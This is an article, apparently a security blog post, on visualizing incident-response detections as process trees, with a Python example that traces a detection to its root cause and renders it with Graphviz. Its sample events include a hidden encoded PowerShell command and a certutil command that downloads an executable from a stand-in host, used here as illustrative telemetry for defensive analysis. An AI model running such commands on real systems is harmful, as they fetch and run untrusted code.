Visibility is always a priority, but it’s vital when responding to an incident. Time is always working against incident responders. Looking through rows of text data and making connections between them and the suspicious activity under investigation is time spent not remediating the problem, which is a real waste when you’re under pressure to stop an attack.
So, why is visualizing detections crucial for incident response? Blue teams, especially those in larger companies, are hammered with security alerts all day. Anything that lessens that considerable load frees resources for more productive work and reduces alert fatigue and burnout.
Taking data and presenting it in a way that is natural and intuitive for humans will reduce response times and spur action when an anomaly is detected. Additionally, it will reduce fatigue, which is common for IR teams that are responding to detections (sometimes in 10–12-hour shifts, with decreasing attention levels as the day progresses). Finally, having a visual of the detection will help facilitate communication across teams, some of whom are not accustomed to getting meaningful information from large data streams.
Understand relationships between your data points

Consider a set of unique data points. If we understand the relationship between each pair of them, we can automate the construction of a relationship tree covering all of them, which in turn infers relationships between points separated by many degrees. In cybersecurity, the points might be events (processes, event log entries, or detections) and the relationship between them causation: a process creation event, for instance, names its parent process. If our domain knowledge lets us reason about which event is likely to have caused which other event(s), the tree can be built from those pairwise links. This saves the analyst from inferring the causation manually, which expedites:
- Understanding the full scope of the attacker's activity
- Tracing the tree all the way back to the likely root cause
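As an added example (not code from the original article), the following Python builds exactly this kind of causation tree from process-creation events, using the parent-PID relation as the pairwise link. It traces a flagged process back to its likely root cause, enumerates the full scope of what that process spawned, and emits a Graphviz DOT rendering in which the verdict is encoded as color and the process class as shape, which is the "tree with varying visual properties" idea the article returns to later. The events, the script-host list, and the `suspicious` verdicts are all constructed for illustration.

```python
"""Added example: build a causation tree from process events, trace a
detection back to its likely root cause, and emit a visual encoding of it.
Every event below is constructed for illustration; none is real telemetry."""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Event:
    pid: int
    ppid: int
    image: str
    cmdline: str
    suspicious: bool = False  # verdict assumed to come from an upstream detection rule


# Constructed sample: a macro document spawns an encoded PowerShell, which
# spawns a downloader and a DLL loader; chrome.exe is an unrelated sibling.
EVENTS = [
    Event(100, 1, "explorer.exe", "explorer.exe"),
    Event(200, 100, "outlook.exe", "outlook.exe"),
    Event(300, 200, "winword.exe", 'winword.exe "invoice.docm"'),
    Event(400, 300, "powershell.exe", "powershell -nop -w hidden -enc SQBFAFgA", suspicious=True),
    Event(500, 400, "certutil.exe", "certutil -urlcache -f http://example.invalid/a.exe a.exe", suspicious=True),
    Event(600, 400, "rundll32.exe", "rundll32 a.dll,Run"),
    Event(700, 100, "chrome.exe", "chrome.exe"),
]

# Hypothetical list of script hosts, used only to pick a node shape.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def build_tree(events):
    """Index events by pid and by parent pid. The pairwise ppid -> pid relation
    is all we need; the whole tree falls out of following it."""
    by_pid = {e.pid: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e.ppid].append(e.pid)
    return by_pid, dict(children)


def root_cause_chain(pid, by_pid):
    """Walk parent links from a detection to the earliest ancestor we have
    telemetry for. The visited set guards against cycles caused by PID reuse."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = by_pid[pid].ppid
    return chain[::-1]


def scope(pid, children):
    """Every descendant of pid: the full extent of the activity it caused."""
    out, stack = [], [pid]
    while stack:
        for c in children.get(stack.pop(), []):
            out.append(c)
            stack.append(c)
    return sorted(out)


def render(pid, by_pid, children, depth=0):
    """Indented text tree with a '!!' marker on nodes the detection flagged."""
    e = by_pid[pid]
    lines = [f"{'  ' * depth}{'!!' if e.suspicious else '  '} {e.image} ({e.pid})"]
    for c in children.get(pid, []):
        lines.extend(render(c, by_pid, children, depth + 1))
    return lines


def to_dot(root, by_pid, children):
    """Graphviz DOT for the subtree under root. Color carries the verdict and
    shape carries the process class, so both are readable pre-attentively."""
    lines = ["digraph detection {", "  rankdir=LR;"]
    for pid in [root] + scope(root, children):
        e = by_pid[pid]
        color = "#e06666" if e.suspicious else "#d9d9d9"
        shape = "box" if e.image.lower() in SCRIPT_HOSTS else "ellipse"
        lines.append(f'  "{pid}" [label="{e.image}\\n{pid}" shape={shape} style=filled fillcolor="{color}"];')
        for c in children.get(pid, []):
            lines.append(f'  "{pid}" -> "{c}";')
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    by_pid, children = build_tree(EVENTS)
    chain = root_cause_chain(500, by_pid)  # from the certutil detection back to explorer
    print("root cause chain:", [by_pid[p].image for p in chain])
    print("\n".join(render(chain[0], by_pid, children)))
    print(to_dot(300, by_pid, children))  # pipe through: dot -Tpng -o tree.png
```

Two caveats a responder will hit immediately on real data. First, bare PIDs are reused by the operating system, so join on whatever unique process identifier your telemetry provides (Sysmon's ProcessGuid, or the EDR's equivalent) rather than on the pid alone; the visited-set check above only stops the walk from looping, it does not undo a wrong join. Second, the chain stops at the earliest ancestor present in the dataset, so a parent that was never logged (the host booted before collection started, or the sensor dropped the event) silently becomes the "root"; treat the top of the chain as the earliest known event, not as proof of initial access.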
After determining our data points' relationships, we must visualize them. Thanks to millions of years of evolution, the human brain is remarkably good at finding patterns and relationships between objects. It registers characteristics like shape, color, and size before we are consciously aware of what we are perceiving. This is the fast, automatic mode of thought that the psychologist Daniel Kahneman calls "System 1", often informally labelled the "reptilian brain": the part of the mind that processes its environment instinctively.
Defenders can exploit this part of the brain to their advantage. Bringing this back to security events, we can map event attributes onto the visual properties it already processes pre-attentively (shape, color, size) and lay the causal relationships out as a tree. In short, we can present our data in a way that allows the reptilian brain to do its thing.
Once this groundwork has been done, we can call in the neocortex (the rational, conscious part of the brain) to audit these findings and work out what best to do with the information.
Depending on the data type, the relationships between the data points may not be clear. Or the relationships may be clear, but how to represent them as a visualization may not be. BloodHound is a good example of a solution to this problem: it renders Active Directory relationships (group memberships, sessions, permissions) as a graph, exposing attack paths that could not be intuitively perceived from the raw data, let alone visualized.
We only know whether relationship visualization will work by experimentation. Experimentation requires having a working knowledge of your dataset, generating hypotheses about the relationships within, and testing them. There will undoubtedly be “failed” experiments (hypotheses that seemed sound but failed to produce useful visualizations). Still, in the process of experimentation, you will have gained a deeper understanding of your dataset. This understanding is crucial for effective analysis and will help you when generating future hypotheses.
Our society is currently experiencing a renaissance in artificial intelligence and machine learning. As a result, we are often led to believe that "more complex is better." There are numerous examples where this is true (the human brain is arguably the most complex known object in the universe), but the belief can make us overlook simple, elegant ways of solving a problem.
Creating a tree whose data points vary in their visual properties is a simple but effective idea for relationship analysis. Pie charts and scatter plots can be just as effective for statistical analysis, and sometimes a Venn diagram is all you need for similarity analysis. There are countless visualization methods that can communicate information efficiently.